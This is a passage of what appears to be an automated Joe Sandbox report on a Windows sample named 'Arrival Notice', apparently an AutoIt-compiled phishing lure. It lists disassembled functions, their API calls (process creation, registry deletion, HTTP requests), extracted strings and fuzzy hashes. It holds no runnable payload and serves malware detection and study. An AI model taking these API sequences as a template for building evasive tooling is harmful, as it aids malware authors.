                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                  • API String ID: 0-1645009161
                  • Opcode ID: 946fb804a9827832f921f5489139c918ab885c5f29ba7d1ff0d04980136efb82
                  • Instruction ID: 7fab878516d08c4ee19de0f64af3d4a1754848020a21d4dc84bb2911c89c63f7
                  • Opcode Fuzzy Hash: 946fb804a9827832f921f5489139c918ab885c5f29ba7d1ff0d04980136efb82
                  • Instruction Fuzzy Hash: 8F81E271A00209BBDB22AF60DC43FFA37A9EF55304F154026FB05AE592EB75AA11D790
                  Function 00415A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                  Download Yara Rule
                  APIs
                  • LoadIconW.USER32(00000063), ref: 00415A2E
                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00415A40
                  • SetWindowTextW.USER32(?,?), ref: 00415A57
                  • GetDlgItem.USER32(?,000003EA), ref: 00415A6C
                  • SetWindowTextW.USER32(00000000,?), ref: 00415A72
                  • GetDlgItem.USER32(?,000003E9), ref: 00415A82
                  • SetWindowTextW.USER32(00000000,?), ref: 00415A88
                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00415AA9
                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00415AC3
                  • GetWindowRect.USER32(?,?), ref: 00415ACC
                  • _wcslen.LIBCMT ref: 00415B33
                  • SetWindowTextW.USER32(?,?), ref: 00415B6F
                  • GetDesktopWindow.USER32 ref: 00415B75
                  • GetWindowRect.USER32(00000000), ref: 00415B7C
                  • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00415BD3
                  • GetClientRect.USER32(?,?), ref: 00415BE0
                  • PostMessageW.USER32(?,00000005,00000000,?), ref: 00415C05
                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00415C2F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                  • String ID:
                  • API String ID: 895679908-0
                  • Opcode ID: 74bc363e33b68157d9cc49e9248c239a9b4d52831ec64c4219990c888fc6b316
                  • Instruction ID: cc04c5a136c903036512c9b13869d5661c610421654299a09eee57ca4209f4f2
                  • Opcode Fuzzy Hash: 74bc363e33b68157d9cc49e9248c239a9b4d52831ec64c4219990c888fc6b316
                  • Instruction Fuzzy Hash: 47718F31900B05DFDB20DFA9CE85AEEBBF5FF88704F144529E542A26A0D775B940CB58
                  Function 004130F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen
                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[G
                  • API String ID: 176396367-143033165
                  • Opcode ID: 919a2f1029db8d7a294bd87cbe820f2f45d2dbb2561d5d2fd1a8b1498633f905
                  • Instruction ID: 5e5532ab242e250a8425d4c998ed9ac13062ac478c07258deb8741e84e5a104a
                  • Opcode Fuzzy Hash: 919a2f1029db8d7a294bd87cbe820f2f45d2dbb2561d5d2fd1a8b1498633f905
                  • Instruction Fuzzy Hash: C6E1F432A00516ABCB15DF78C851BEEBBB5BF04711F24812BE456EB340DB38AEC58794
                  Function 003D00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                  Download Yara Rule
                  APIs
                  • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 003D00C6
                    • Part of subcall function 003D00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0048070C,00000FA0,59887FBB,?,?,?,?,003F23B3,000000FF), ref: 003D011C
                    • Part of subcall function 003D00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003F23B3,000000FF), ref: 003D0127
                    • Part of subcall function 003D00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003F23B3,000000FF), ref: 003D0138
                    • Part of subcall function 003D00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 003D014E
                    • Part of subcall function 003D00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 003D015C
                    • Part of subcall function 003D00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 003D016A
                    • Part of subcall function 003D00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003D0195
                    • Part of subcall function 003D00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003D01A0
                  • ___scrt_fastfail.LIBCMT ref: 003D00E7
                    • Part of subcall function 003D00A3: __onexit.LIBCMT ref: 003D00A9
                  Strings
                  • SleepConditionVariableCS, xrefs: 003D0154
                  • WakeAllConditionVariable, xrefs: 003D0162
                  • InitializeConditionVariable, xrefs: 003D0148
                  • kernel32.dll, xrefs: 003D0133
                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 003D0122
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                  • API String ID: 66158676-1714406822
                  • Opcode ID: bc72fa33678e38fba43ab146baea29b284db4d5aaef3c18de4ff3d207cb9a9db
                  • Instruction ID: 68b36fa1dd2ea7016a8520bf8ec2e7d81c7bbd86c2f343948f704e9a31623a75
                  • Opcode Fuzzy Hash: bc72fa33678e38fba43ab146baea29b284db4d5aaef3c18de4ff3d207cb9a9db
                  • Instruction Fuzzy Hash: FC214637A013106BE7566BB4BC46B6E3394EB05F51F15053BF802E6391DB749C008B98
                  Function 004244C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                  Download Yara Rule
                  APIs
                  • CharLowerBuffW.USER32(00000000,00000000,0044CC08), ref: 00424527
                  • _wcslen.LIBCMT ref: 0042453B
                  • _wcslen.LIBCMT ref: 00424599
                  • _wcslen.LIBCMT ref: 004245F4
                  • _wcslen.LIBCMT ref: 0042463F
                  • _wcslen.LIBCMT ref: 004246A7
                    • Part of subcall function 003CF9F2: _wcslen.LIBCMT ref: 003CF9FD
                  • GetDriveTypeW.KERNEL32(?,00476BF0,00000061), ref: 00424743
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharDriveLowerType
                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                  • API String ID: 2055661098-1000479233
                  • Opcode ID: 7a4004d4b2ed3360db04da4aa590d98bfa63b421adffc2e5d13f5696b96eabc8
                  • Instruction ID: 89486c85f32388680e60e7d199b7df89a84323dda6c298e18f43adbbd4277b22
                  • Opcode Fuzzy Hash: 7a4004d4b2ed3360db04da4aa590d98bfa63b421adffc2e5d13f5696b96eabc8
                  • Instruction Fuzzy Hash: 1CB1F0316083229BC710DF28E890A6BB7E5EFE5724F90891EF196C7391D738D885CA56
                  Function 0044911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 003C9BB2
                  • DragQueryPoint.SHELL32(?,?), ref: 00449147
                    • Part of subcall function 00447674: ClientToScreen.USER32(?,?), ref: 0044769A
                    • Part of subcall function 00447674: GetWindowRect.USER32(?,?), ref: 00447710
                    • Part of subcall function 00447674: PtInRect.USER32(?,?,00448B89), ref: 00447720
                  • SendMessageW.USER32(?,000000B0,?,?), ref: 004491B0
                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004491BB
                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004491DE
                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00449225
                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0044923E
                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00449255
                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00449277
                  • DragFinish.SHELL32(?), ref: 0044927E
                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00449371
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#H
                  • API String ID: 221274066-139388415
                  • Opcode ID: 70beec3ddfa39b8c02e29000a922804ccd3d8bc0f65f590a2ba7275153db3d68
                  • Instruction ID: 10abd8b6bdddb4ec7adc850bac50b3488575e7d534a6a1a98a7e241bf1bff564
                  • Opcode Fuzzy Hash: 70beec3ddfa39b8c02e29000a922804ccd3d8bc0f65f590a2ba7275153db3d68
                  • Instruction Fuzzy Hash: 74618871108300AFD701EF60DC85EAFBBE8EF89754F00092EFA95971A0DB709A09CB56
                  Function 0043AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                  Download Yara Rule
                  APIs
                  • _wcslen.LIBCMT ref: 0043B198
                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0043B1B0
                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0043B1D4
                  • _wcslen.LIBCMT ref: 0043B200
                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0043B214
                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0043B236
                  • _wcslen.LIBCMT ref: 0043B332
                    • Part of subcall function 004205A7: GetStdHandle.KERNEL32(000000F6), ref: 004205C6
                  • _wcslen.LIBCMT ref: 0043B34B
                  • _wcslen.LIBCMT ref: 0043B366
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0043B3B6
                  • GetLastError.KERNEL32(00000000), ref: 0043B407
                  • CloseHandle.KERNEL32(?), ref: 0043B439
                  • CloseHandle.KERNEL32(00000000), ref: 0043B44A
                  • CloseHandle.KERNEL32(00000000), ref: 0043B45C
                  • CloseHandle.KERNEL32(00000000), ref: 0043B46E
                  • CloseHandle.KERNEL32(?), ref: 0043B4E3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                  • String ID:
                  • API String ID: 2178637699-0
                  • Opcode ID: dc3b31b5c5764157022b37278bc8a7ecb8027e275ac7636d897c0ec203a84134
                  • Instruction ID: cb683fb298344cdccad001e077098ecc9d516ad1dd280d490a68d7a3d79fbb9a
                  • Opcode Fuzzy Hash: dc3b31b5c5764157022b37278bc8a7ecb8027e275ac7636d897c0ec203a84134
                  • Instruction Fuzzy Hash: D6F17B316042009FC725EF24C891B6BBBE5EF89314F14855EFA958F2A2CB35EC45CB96
                  Function 003B326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetMenuItemCount.USER32(00481990), ref: 003F2F8D
                  • GetMenuItemCount.USER32(00481990), ref: 003F303D
                  • GetCursorPos.USER32(?), ref: 003F3081
                  • SetForegroundWindow.USER32(00000000), ref: 003F308A
                  • TrackPopupMenuEx.USER32(00481990,00000000,?,00000000,00000000,00000000), ref: 003F309D
                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003F30A9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                  • String ID: 0
                  • API String ID: 36266755-4108050209
                  • Opcode ID: b6168d5e62a9ab00a9bf70991f0f78d27eba7de01c32677f267718d1e0521d91
                  • Instruction ID: 720d702772d5ea5a0605752d860673988f524fd7c9331e4c1e83e0930eaa79c3
                  • Opcode Fuzzy Hash: b6168d5e62a9ab00a9bf70991f0f78d27eba7de01c32677f267718d1e0521d91
                  • Instruction Fuzzy Hash: 4F711870644219BEFB228F25CC89FEABF68FF01324F244216F7156A5E0C7B1A950DB90
                  Function 00446CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                  Download Yara Rule
                  APIs
                  • DestroyWindow.USER32(?,?), ref: 00446DEB
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00446E5F
                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00446E81
                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00446E94
                  • DestroyWindow.USER32(?), ref: 00446EB5
                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,003B0000,00000000), ref: 00446EE4
                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00446EFD
                  • GetDesktopWindow.USER32 ref: 00446F16
                  • GetWindowRect.USER32(00000000), ref: 00446F1D
                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00446F35
                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00446F4D
                    • Part of subcall function 003C9944: GetWindowLongW.USER32(?,000000EB), ref: 003C9952
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                  • String ID: 0$tooltips_class32
                  • API String ID: 2429346358-3619404913
                  • Opcode ID: aefe765eb1486e0bcd4934e6867c32eefcdbd2e647e0144eb8cc8e9057a6739b
                  • Instruction ID: 39bdb7de4287c8100972b5f1fbd69e19b63485c9103aeea6f0034b82bacdab51
                  • Opcode Fuzzy Hash: aefe765eb1486e0bcd4934e6867c32eefcdbd2e647e0144eb8cc8e9057a6739b
                  • Instruction Fuzzy Hash: 48715F74104344AFEB21CF18D854FAB7BE9FB8A304F15442EF59987261C774A90ACB1A
                  Function 0042C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                  Download Yara Rule
                  APIs
                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0042C4B0
                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0042C4C3
                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0042C4D7
                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0042C4F0
                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0042C533
                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0042C549
                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0042C554
                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0042C584
                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0042C5DC
                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0042C5F0
                  • InternetCloseHandle.WININET(00000000), ref: 0042C5FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                  • String ID:
                  • API String ID: 3800310941-3916222277
                  • Opcode ID: 27eca9588c627dee56ad8c426ee2b103d3aef27090cd621e8acea2d018b89273
                  • Instruction ID: 2ea71def38b13e99ae5423947726de92950d1ed4154f0bb23ba2ac44f0a2b896
                  • Opcode Fuzzy Hash: 27eca9588c627dee56ad8c426ee2b103d3aef27090cd621e8acea2d018b89273
                  • Instruction Fuzzy Hash: 2C519CB4600625BFDB218F60D9C8AAF7BFCFF09344F44442AF945D6210DB78E9449B68
                  Function 0044856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00448592
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 004485A2
                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004485AD
                  • CloseHandle.KERNEL32(00000000), ref: 004485BA
                  • GlobalLock.KERNEL32(00000000), ref: 004485C8
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004485D7
                  • GlobalUnlock.KERNEL32(00000000), ref: 004485E0
                  • CloseHandle.KERNEL32(00000000), ref: 004485E7
                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 004485F8
                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,0044FC38,?), ref: 00448611
                  • GlobalFree.KERNEL32(00000000), ref: 00448621
                  • GetObjectW.GDI32(?,00000018,000000FF), ref: 00448641
                  • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00448671
                  • DeleteObject.GDI32(00000000), ref: 00448699
                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004486AF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                  • String ID:
                  • API String ID: 3840717409-0
                  • Opcode ID: f60bc7e267d556694d3ce3eb84bb416a5e872f45d4596b0e7db89f94d923ffc6
                  • Instruction ID: 7d140f1140c9188c682c7661c6fb3880d376ab7319c7985322560c97ee6d7ca6
                  • Opcode Fuzzy Hash: f60bc7e267d556694d3ce3eb84bb416a5e872f45d4596b0e7db89f94d923ffc6
                  • Instruction Fuzzy Hash: 9C412B75601208BFEB519FA5CC88EAF7BB8FF8A711F144069F905E7260DB749901CB24
                  Function 004214BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                  Download Yara Rule
                  APIs
                  • VariantInit.OLEAUT32(00000000), ref: 00421502
                  • VariantCopy.OLEAUT32(?,?), ref: 0042150B
                  • VariantClear.OLEAUT32(?), ref: 00421517
                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004215FB
                  • VarR8FromDec.OLEAUT32(?,?), ref: 00421657
                  • VariantInit.OLEAUT32(?), ref: 00421708
                  • SysFreeString.OLEAUT32(?), ref: 0042178C
                  • VariantClear.OLEAUT32(?), ref: 004217D8
                  • VariantClear.OLEAUT32(?), ref: 004217E7
                  • VariantInit.OLEAUT32(00000000), ref: 00421823
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                  • API String ID: 1234038744-3931177956
                  • Opcode ID: 0632c477644139bf9ee3dde863f41e2a67f1438ab9095aa392cc33a931efe76c
                  • Instruction ID: 7ef51ebbe2a02ffffcfb3971c85d524c302749e535379336521d23420366146a
                  • Opcode Fuzzy Hash: 0632c477644139bf9ee3dde863f41e2a67f1438ab9095aa392cc33a931efe76c
                  • Instruction Fuzzy Hash: 09D10231700525EBDB109F65E885BB9F7B1BF55700F94809BF406AB2A0DB38DC82DB66
                  Function 0043B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 0043C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0043B6AE,?,?), ref: 0043C9B5
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043C9F1
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043CA68
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043CA9E
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0043B6F4
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0043B772
                  • RegDeleteValueW.ADVAPI32(?,?), ref: 0043B80A
                  • RegCloseKey.ADVAPI32(?), ref: 0043B87E
                  • RegCloseKey.ADVAPI32(?), ref: 0043B89C
                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0043B8F2
                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0043B904
                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 0043B922
                  • FreeLibrary.KERNEL32(00000000), ref: 0043B983
                  • RegCloseKey.ADVAPI32(00000000), ref: 0043B994
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
